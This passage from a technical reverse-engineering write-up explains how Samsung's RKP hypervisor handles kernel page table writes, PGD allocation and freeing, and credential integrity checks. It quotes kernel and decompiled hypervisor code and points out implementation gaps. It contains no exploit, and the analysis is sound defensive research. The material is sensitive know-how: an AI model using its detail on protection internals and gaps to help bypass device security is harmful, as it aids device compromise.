 argument, so all the remaining arguments are shifted by one and the double-mapping tracking never works as intended.
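For reference, here is a minimal sketch of what the kernel-side caller looks like; the command constant and exact prototype are assumptions used for illustration only, but it shows how dropping addr shifts every argument by one slot:
/* Sketch (assumed names): because addr is never passed, the hypervisor
 * receives (order, val, 0) in the slots where rkp_prot_dble_map expects
 * (addr, order, val), so the dbl_bitmap is never updated correctly. */
static inline void dmap_prot(u64 addr, u64 order, u64 val)
{
	if (rkp_cred_enable)
		uh_call(UH_APP_RKP, RKP_PROT_DBLE_MAP /* assumed constant */, order, val, 0, 0);
}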
The last two functions, rkp_cmd_assign_cred_size
and rkp_cmd_assign_ns_size
, are used by the kernel mainly to tell the hypervisor the size of the structures allocated in the read-only caches.
rkp_cmd_assign_cred_size
calls rkp_assign_cred_size
, which saves the sizes of the cred
and task_security_struct
structures into global variables.
int64_t rkp_assign_cred_size(saved_regs_t* regs) {
// ...
// Save the size of the cred structure in `CRED_BUFF_SIZE`.
cred_jar_size = regs->x2;
rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
// Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
tsec_jar_size = regs->x3;
rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}
rkp_cmd_assign_ns_size
calls rkp_assign_ns_size
, which saves the size of the vfsmount
structure, and the offsets of various fields of this structure, into the global variable rkp_cred
that we will detail later.
int64_t rkp_assign_ns_size(saved_regs_t* regs) {
// ...
// The global variable must have been allocated.
if (!rkp_cred) {
return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
}
// The argument structure VA is converted into a PA.
nsparam_user = rkp_get_pa(regs->x2);
if (!nsparam_user) {
return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
}
// It is copied into a local variable before extracting the various fields.
memcpy(&nsparam, nsparam_user, sizeof(nsparam));
// Save the size of the vfsmount structure.
ns_buff_size = nsparam.ns_buff_size;
ns_size = nsparam.ns_size;
rkp_cred->NS_BUFF_SIZE = ns_buff_size;
rkp_cred->NS_SIZE = ns_size;
// Ensure the offsets of the fields are smaller than the vfsmount structure size.
if (nsparam.bp_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
sb_offset = nsparam.sb_offset;
if (nsparam.sb_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
flag_offset = nsparam.flag_offset;
if (nsparam.flag_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
data_offset = nsparam.data_offset;
if (nsparam.data_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
// Save the offsets of the various fields of the vfsmount structure.
rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}
In the Page Tables Processing section, we have seen that most of the kernel page tables are made read-only in the second stage. But what happens if the kernel needs to modify its page table entries? This is what we are going to see in this section.
On the kernel side, the entries are modified for each level in the set_pud
, set_pmd
, and set_pte
functions.
For PUDs and PMDs, set_pud
and set_pmd
first check if the page is protected by the hypervisor by calling the rkp_is_pg_protected
function (that uses the ro_bitmap
). If the page is indeed protected, then they call the RKP_WRITE_PGT1
and RKP_WRITE_PGT2
commands, respectively, instead of performing the write directly.
static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pudp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pudp), "r" (pud)
: "x1", "x2", "memory");
}
#else
*pudp = pud;
#endif
dsb(ishst);
isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pmdp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pmdp), "r" (pmd)
: "x1", "x2", "memory");
}
#else
*pmdp = pmd;
#endif
dsb(ishst);
isb();
}
For PTs, set_pte
also checks if the page is protected, but in addition, it calls rkp_is_pg_dbl_mapped
to check if the physical page is already mapped somewhere else in virtual memory (using the dbl_bitmap
). This way, the kernel can detect double mappings.
static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
/* bug on double mapping */
BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));
if (rkp_is_pg_protected((u64)ptep)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (ptep), "r" (pte)
: "x1", "x2", "memory");
}
#else
*ptep = pte;
#endif
/*
* Only if the new pte is valid and kernel, otherwise TLB maintenance
* or update_mmu_cache() have the necessary barriers.
*/
if (pte_valid_not_user(pte)) {
dsb(ishst);
isb();
}
}
On the hypervisor side, the rkp_cmd_write_pgtx
function simply calls rkp_lxpgt_write
after incrementing a counter.
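A minimal sketch of what these thin wrappers are assumed to look like (the counter name is hypothetical; only the forwarding of the descriptor address in x2 and the new value in x3 matters):
int64_t rkp_cmd_write_pgt1(saved_regs_t* regs) {
  // Bump a statistics counter, then forward to the level 1 write routine.
  rkp_write_pgt1_count++;  /* hypothetical counter name */
  rkp_l1pgt_write(regs->x2 /* descriptor VA */, regs->x3 /* new value */);
  return 0;
}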
We will now detail the checks that are performed by the hypervisor when modifying an entry of each page table level.
rkp_l1pgt_write
handles writes to first level tables (or PUDs). It first ensures the PUD is marked as L1
 in the physmap; if it is not and RKP has not been deferred initialized yet, the write is simply performed, otherwise a policy violation is triggered. It then processes the old descriptor value: blocks are not allowed to be unmapped, tables are processed by the rkp_l2pgt_process_table
function. It then processes the new descriptor value as well: blocks are not allowed to be mapped, and tables are processed by the rkp_l2pgt_process_table
function, and their PXN
bit is set for user PUDs. Finally, the descriptor value is updated.
uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
// ...
  // Convert the PUD descriptor VA into a PA.
pudp_pa = rkp_get_pa(pudp);
// Get the old/current value of the PUD descriptor.
pud_old = *pudp_pa;
rkp_phys_map_lock(pudp_pa);
// Ensure the PUD is marked as such in the physmap.
if (!is_phys_map_l1(pudp_pa)) {
// If it is not, but RKP is not deferred initialized, perform the write.
if (!rkp_deferred_inited) {
set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
// Otherwise, trigger a policy violation.
rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
}
// Check if this is a kernel or user PUD using the physmap.
is_kernel = is_phys_map_kernel(pudp_pa);
// The old descriptor was valid.
if (pud_old) {
// The old descriptor was not a table, thus was a block.
if ((pud_old & 0b11) != 0b11) {
// Unmapping a block is not allowed, trigger a policy violation.
rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
}
// The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
}
// Get the start VA corresponding to the kernel or user page tables.
start_addr = 0xffffff8000000000;
if (!is_kernel) {
start_addr = 0;
}
// The new descriptor is valid.
if (pud_new) {
// Get the VA mapped by the PUD descriptor.
addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
// The new descriptor is not a table, thus is a block.
if ((pud_new & 0b11) != 0b11) {
// Mapping a block is not allowed, trigger a policy violation.
rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
}
// The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
// For user PUD, set the PXN bit of the PUD descriptor.
if (!is_kernel) {
set_pxn_bit_of_desc(&pud_new, 1);
}
// ...
}
if (res) {
uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
// Finally, perform the write of the PUD descriptor on behalf of the kernel.
set_entry_of_pgt(pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
rkp_l2pgt_write
handles writes to second level tables (or PMDs). It first ensures the PMD is marked as L2
in the physmap. It then processes the old and new descriptor values using the check_single_l2e
function. If the old or the new descriptor maps protected memory, the write is disallowed. Finally, if both checks pass, the new descriptor value is written.
uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
// ...
  // Convert the PMD descriptor VA into a PA.
pmdp_pa = rkp_get_pa(pmdp);
// Get the old/current value of the PMD descriptor.
pmd_old = *pmdp_pa;
rkp_phys_map_lock(pmdp_pa);
// Ensure the PMD is marked as such in the physmap.
if (!is_phys_map_l2(pmdp_pa)) {
// If RKP is deferred initialized, continue with the processing.
if (rkp_deferred_inited) {
uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
}
// Otherwise, perform the write.
else {
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
is_flag3 = is_phys_map_flag3(pmdp_pa);
// Check if this is a kernel or user PMD using the physmap.
is_kernel = is_phys_map_kernel(pmdp_pa);
// Get the start VA corresponding to the kernel or user page tables.
start_addr = 0xffffff8000000000;
if (!is_kernel) {
start_addr = 0;
}
// Get the VA mapped by the PMD descriptor.
addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
// If the old descriptor was valid.
if (pmd_old) {
// Call `check_single_l2e` to check the next level.
res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
// If the old descriptor maps protected memory, do not perform the write.
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
// If the new descriptor is valid.
if (pmd_new) {
// Call `check_single_l2e` to check the next level.
res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
// If the new descriptor maps protected memory, do not perform the write.
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
// ...
}
// Finally, perform the write of the PMD descriptor on behalf of the kernel.
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
rkp_l3pgt_write
 handles writes to third level tables (or PTs). There is a special case if the descriptor maps virtual memory right before the kernel text section, in which case its PXN bit is set and the write is performed. Otherwise, the write is allowed if the PT is marked as L3
or as FREE
in the physmap and either the new descriptor is not a page descriptor, or its PXN bit is set, or RKP is not deferred initialized.
int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
  // Convert the PT descriptor VA into a PA.
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
// If the PT is marked as such in the physmap, or as `FREE`.
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
// If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
allowed = 1;
}
// Otherwise, the check fails if RKP is deferred initialized.
else {
allowed = rkp_deferred_inited == 0;
}
}
// If the PT is marked as something else, the check also fails.
else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
cs_enter(&l3pgt_lock);
// In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
// text section and maps memory that is before the start of the kernel text section.
if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
// Set the PXN bit of the new descriptor value.
if (pte_val) {
pte_val |= (1 << 53);
}
cs_exit(&l3pgt_lock);
// And perform the write on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
cs_exit(&l3pgt_lock);
// If the check failed, trigger a policy violation.
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
// Otherwise, perform the write of the PT descriptor on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
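To make the special case more concrete, here is a small worked example with made-up addresses:
/* Illustrative values only: assume stext_ptep == 0x987654320 (the descriptor
 * mapping the start of the kernel text) and the write targets
 * ptep_pa == 0x987654100. Then ptep_pa < stext_ptep and
 * (ptep_pa ^ stext_ptep) == 0x220 <= 0xfff: both descriptors live in the same
 * 4 KB level 3 table, so the entry maps memory located just before the kernel
 * text, and RKP only forces its PXN bit (bit 53) before performing the write. */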
In addition to modifying the descriptors contained in the PUDs, PMDs, and PTs, the kernel also needs to allocate, and sometimes free, PGDs.
On the kernel side, the allocation of a PGD is done by the pgd_alloc
function. It calls rkp_ro_alloc
to get a read-only page from the hypervisor and then invokes the RKP_NEW_PGD
command to notify RKP that this page will be a PGD.
pgd_t *pgd_alloc(struct mm_struct *mm)
{
// ...
pgd_t *ret = NULL;
ret = (pgd_t *) rkp_ro_alloc();
if (!ret) {
if (PGD_SIZE == PAGE_SIZE)
ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
else
ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
}
if(unlikely(!ret)) {
pr_warn("%s: pgd alloc is failed\n", __func__);
return ret;
}
uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
return ret;
// ...
}
The freeing of a PGD is done by the pgd_free
function. It invokes the RKP_FREE_PGD
command to notify RKP that this page will no longer be a PGD and then calls rkp_ro_free
to relinquish the page to the hypervisor.
void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
// ...
uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);
/* if pgd memory come from read only buffer, the put it back */
/*TODO: use a macro*/
if (is_rkp_ro_page((u64)pgd))
rkp_ro_free((void *)pgd);
else {
if (PGD_SIZE == PAGE_SIZE)
free_page((unsigned long)pgd);
else
kmem_cache_free(pgd_cache, pgd);
}
// ...
}
On the hypervisor side, the rkp_cmd_new_pgd
function ends up calling rkp_l1pgt_new_pgd
after incrementing a counter. This function disallows allocating swapper_pg_dir
, idmap_pg_dir
, or tramp_pg_dir
. If RKP is initialized, it calls rkp_l1pgt_process_table
to process the new PGD (that is assumed to be a user PGD).
void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
// ...
// Convert the PGD VA into a PA.
pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
// The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
}
// If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
else if (rkp_inited) {
if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
}
The rkp_cmd_free_pgd
function ends up calling rkp_l1pgt_free_pgd
after incrementing a counter. This function disallows freeing swapper_pg_dir
, idmap_pg_dir
, or tramp_pg_dir
. If RKP is initialized, it calls rkp_l1pgt_process_table
to process the old PGD, unless it is the currently active user or kernel PGD, in which case an error is raised and the hypervisor panics.
void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
// ...
// Convert the PGD VA into a PA.
pgd_pa = rkp_get_pa(regs->x2);
pgdp = pgd_pa & 0xfffffffffffff000;
// The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
ID_MAP_PGD);
rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
}
// If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
else if (rkp_inited) {
// Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
(get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
get_ttbr0_el1(), get_ttbr1_el1());
}
if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
}
In the Protecting Kernel Data section, we have seen that the cred
and task_security_struct
structures are now allocated on read-only pages provided by the hypervisor. Thus, they can no longer be modified directly by the kernel. In addition, new fields are added to these structures for Data Flow Integrity (DFI) purposes. In particular, each structure now gets a "back-pointer", i.e. a pointer to the owning structure:
- the task_struct for the cred structure;
- the cred for the task_security_struct structure.

The cred structure also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the cred
structure of another task_struct
(in particular, one might try to reuse the init
task credentials).
struct cred {
// ...
atomic_t *use_cnt;
struct task_struct *bp_task;
void *bp_pgd;
unsigned long long type;
} __randomize_layout;
struct task_security_struct {
// ...
void *bp_cred;
};
These back-pointers and values are verified when a SELinux hook is executed via a call to security_integrity_current
. On our research device, the call to this function is missing, so in this section we will take a look at the source code of a different Samsung device that has it.
The kernel macros call_void_hook
and call_int_hook
contain the calls to security_integrity_current
.
#define call_void_hook(FUNC, ...) \
do { \
struct security_hook_list *P; \
\
if(security_integrity_current()) break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) \
P->hook.FUNC(__VA_ARGS__); \
} while (0)
#define call_int_hook(FUNC, IRC, ...) ({ \
int RC = IRC; \
do { \
struct security_hook_list *P; \
\
RC = security_integrity_current(); \
if (RC != 0) \
break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
RC = P->hook.FUNC(__VA_ARGS__); \
if (RC != 0) \
break; \
} \
} while (0); \
RC; \
})
security_integrity_current
first calls rkp_is_valid_cred_sp
to verify that the credentials and security structures are allocated from a hypervisor-protected page. It then calls cmp_sec_integrity
to verify the credentials' integrity, and cmp_ns_integrity
to verify the mount namespace's integrity.
int security_integrity_current(void)
{
rcu_read_lock();
if ( rkp_cred_enable &&
(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
cmp_sec_integrity(current_cred(),current->mm)||
cmp_ns_integrity())) {
rkp_print_debug();
rcu_read_unlock();
panic("RKP CRED PROTECTION VIOLATION\n");
}
rcu_read_unlock();
return 0;
}
rkp_is_valid_cred_sp
ensures that the credentials and security structures are protected by the hypervisor. init_cred
and init_sec
form a valid pair. For other pairs, the start and end of the structures must be located in a read-only page that has been allocated by the hypervisor. In addition, the back-pointer of the task_security_struct
must be the correct cred
structure.
extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
struct task_security_struct *tsec = (struct task_security_struct *)sp;
if((cred == (u64)&init_cred) &&
( sp == (u64)&init_sec)){
return 0;
}
if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
(!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
return 1;
}
if((u64)tsec->bp_cred != cred) {
return 1;
}
return 0;
}
cmp_sec_integrity
checks that the back-pointer of the cred
is the current task_struct
, and that both the PGD pointer of the cred
and the current memory descriptor point to the same PGD that must not be swapper_pg_dir
.
static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
return ((cred->bp_task != current) ||
(mm && (!( in_interrupt() || in_softirq())) &&
(cred->bp_pgd != swapper_pg_dir) &&
(mm->pgd != cred->bp_pgd)));
}
In order to be able to modify the cred
structure of processes on behalf of the kernel and to perform verifications on the values of its fields, the hypervisor needs to be aware of its layout and of the layout of the task_struct
structure.
On the kernel side, the function that does that is kdp_init
. It invokes the RKP_KDP_X40
command with the offsets needed by RKP and, in addition, the virtual addresses of the verifiedbootstate
and ss_initialized
global variables.
void kdp_init(void)
{
kdp_init_t cred;
cred.credSize = sizeof(struct cred);
cred.sp_size = rkp_get_task_sec_size();
cred.pgd_mm = offsetof(struct mm_struct,pgd);
cred.uid_cred = offsetof(struct cred,uid);
cred.euid_cred = offsetof(struct cred,euid);
cred.gid_cred = offsetof(struct cred,gid);
cred.egid_cred = offsetof(struct cred,egid);
cred.bp_pgd_cred = offsetof(struct cred,bp_pgd);
cred.bp_task_cred = offsetof(struct cred,bp_task);
cred.type_cred = offsetof(struct cred,type);
cred.security_cred = offsetof(struct cred,security);
cred.usage_cred = offsetof(struct cred,use_cnt);
cred.cred_task = offsetof(struct task_struct,cred);
cred.mm_task = offsetof(struct task_struct,mm);
cred.pid_task = offsetof(struct task_struct,pid);
cred.rp_task = offsetof(struct task_struct,real_parent);
cred.comm_task = offsetof(struct task_struct,comm);
cred.bp_cred_secptr = rkp_get_offset_bp_cred();
cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
cred.selinux.ss_initialized_va = (u64)&ss_initialized;
#endif
uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}
The first function called by kdp_init
, rkp_get_task_sec_size
, simply returns the size of the task_security_struct
structure.
unsigned int rkp_get_task_sec_size(void)
{
return sizeof(struct task_security_struct);
}
And the second function, rkp_get_offset_bp_cred
, returns the offset of its bp_cred
(back-pointer to credentials) field.
unsigned int rkp_get_offset_bp_cred(void)
{
return offsetof(struct task_security_struct,bp_cred);
}
kdp_init is called by the cred_init function, which is itself called from the start_kernel function.
asmlinkage __visible void __init start_kernel(void)
{
// ...
cred_init();
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_cred_init
, which calls rkp_cred_init
.
rkp_cred_init
allocates the rkp_cred
 structure, extracts and sanity-checks the various offsets provided by the kernel, and stores them into this structure. It also stores whether the device is unlocked and the physical address of the variable denoting whether SELinux is initialized.
void rkp_cred_init(saved_regs_t* regs) {
// ...
// Allocate the `rkp_cred` structure that will hold all the offsets.
rkp_cred = malloc(0xf0, 0);
// Convert the VA of the kernel argument structure to a PA.
cred = rkp_get_pa(regs->x2);
// Ensure we're not calling this function multiple times.
if (cred_inited == 1) {
uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
return;
}
// Extract the various fields of the kernel-provided structure.
cred_inited = 1;
credSize = cred->credSize;
sp_size = cred->sp_size;
uid_cred = cred->uid_cred;
euid_cred = cred->euid_cred;
gid_cred = cred->gid_cred;
egid_cred = cred->egid_cred;
usage_cred = cred->usage_cred;
bp_pgd_cred = cred->bp_pgd_cred;
bp_task_cred = cred->bp_task_cred;
type_cred = cred->type_cred;
security_cred = cred->security_cred;
bp_cred_secptr = cred->bp_cred_secptr;
// Ensure the offsets within a structure are not bigger than the structure total size.
if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
security_cred > credSize || bp_cred_secptr > sp_size) {
uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
return;
}
// Store the various fields into the corresponding global variables.
rkp_cred->CRED_SIZE = cred->credSize;
rkp_cred->SP_SIZE = sp_size;
rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
rkp_cred->CRED_USE_CNT = usage_cred >> 3;
rkp_cred->VERIFIED_BOOT_STATE = 0;
// Convert the VB state VA to a PA, and store the device unlock state in a global variable.
vbs_va = cred->verifiedbootstate;
if (vbs_va) {
vbs_pa = check_and_convert_kernel_input(vbs_va);
if (vbs_pa != 0) {
rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
}
}
rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
// For `ss_initialized`, convert the VA to a PA and store it into a global variable.
rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}
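Note that most offsets are stored right-shifted by 2 or 3 because the hypervisor later accesses the corresponding fields as 32-bit or 64-bit words and scales the stored value back. A quick worked example (the offset value is illustrative, not taken from a real build):
/* Illustrative value only: if offsetof(struct cred, euid) == 0x14, then
 * rkp_cred_init stores CRED_EUID_OFFSET = 0x14 >> 2 = 5, and rkp_assign_creds
 * later reads the field back as *(curr_cred + 4 * 5), i.e. at offset 0x14. */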
When the kernel needs to set the PGD of a task_struct
, it calls into the hypervisor, which updates the PGD back-pointer (bp_pgd) of the task's cred structure.
On the kernel side, the change of a task PGD can happen in two places. The first one is exec_mmap
, which invokes the RKP_KDP_X43
command.
static int exec_mmap(struct mm_struct *mm)
{
// ...
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
}
// ...
}
The second one is the rkp_assign_pgd
function, which invokes the same command.
void rkp_assign_pgd(struct task_struct *p)
{
u64 pgd;
pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);
uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}
rkp_assign_pgd
is called from copy_process
, which is executed when a process is being copied.
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
// ...
if(rkp_cred_enable)
rkp_assign_pgd(p);
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_pgd_assign
, which simply calls rkp_pgd_assign
.
rkp_pgd_assign
calls rkp_phys_map_verify_cred
to ensure the kernel-provided structure is a legitimate cred
structure before writing the new value of the bp_pgd
field of the cred
structure.
void rkp_pgd_assign(saved_regs_t* regs) {
// ...
// Convert the VA of the cred structure into a PA.
cred = rkp_get_pa(regs->x2);
// The new PGD of the task is in register x3.
pgd = regs->x3;
// Verify that the credentials are valid and hypervisor-protected.
if (rkp_phys_map_verify_cred(cred)) {
uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !! %lx %lx %lx", cred, regs->x2, pgd);
return;
}
  // Update the bp_pgd field of the cred structure if the check passed.
*(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}
rkp_phys_map_verify_cred
verifies that the pointer is aligned on the size of the cred
structure and marked as CRED
in the physmap.
int64_t rkp_phys_map_verify_cred(uint64_t cred) {
// ...
// The credentials pointer must not be NULL.
if (!cred) {
return 1;
}
// It must be aligned on its expected size.
if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
return 1;
}
rkp_phys_map_lock(cred);
// It must be marked as `CRED` in the physmap.
  if (!is_phys_map_cred(cred)) {
uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
rkp_phys_map_unlock(cred);
return 1;
}
rkp_phys_map_unlock(cred);
return 0;
}
Similarly to a change in the task PGD, the kernel also calls into the hypervisor to change the security
field of a cred
structure.
